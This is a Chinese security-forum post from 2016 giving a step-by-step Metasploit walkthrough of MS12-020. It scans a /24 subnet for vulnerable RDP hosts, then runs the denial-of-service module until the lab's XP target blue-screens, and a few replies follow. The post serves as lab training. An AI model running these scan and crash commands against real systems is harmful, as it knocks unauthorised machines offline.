查看: 24850|回复: 3

【原创】ms12-020漏洞利用过程

[复制链接]
发表于 2016-5-21 02:31:21 | 显示全部楼层 |阅读模式
需要kali xp靶机(如果你本机安装了metasploit,直接使用就行)

1.1.png
首先输入msfconsole进入msf
接着search 漏洞编号 查看它的一个漏洞利用模块,这里有两个。
auxiliary/scanner/rdp/ms12_020_check  侦查
auxiliary/dos/windows/rdp/ms12_020_maxchannelids利用

2.png
那么先来用侦查模块看一下目标主机同网段的是否有主机存在漏洞
use auxiliary/scanner/rdp/ms12_020_check  进入漏洞利用模块
show options 查看需要设置的选项

这里需要设置RHOSTS(目标网段) THREADS(线程)
那么 set RHOSTS 192.168.75.0/24 扫描目标网段
set THREADS 45 线程45
run 进行扫描
3.png
接着开始扫描,可以看到这里出现了一个加号 后面跟着这一句(不懂可以百度翻译啊)
接着需要用到另一个模块来进行攻击
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 进入利用模块
接着 show options 查看需要设置什么
4.png


这里只需要给他一个地址就行 接着run 进行攻击
5.png

接着靶机就蓝屏了。。。。。。。。。。
回复

使用道具 举报

发表于 2016-5-22 23:35:31 | 显示全部楼层
这个是命令执行还是BSOD
回复

使用道具 举报

发表于 2016-5-23 20:43:27 | 显示全部楼层
哥们 多少年的东西了 就别挂原创了 不过还是多谢分享
回复 支持 反对

使用道具 举报

发表于 2016-5-24 16:34:24 | 显示全部楼层
Sharpwinner
啪,蓝屏了。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-10 06:42 , Processed in 0.025237 second(s), 12 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部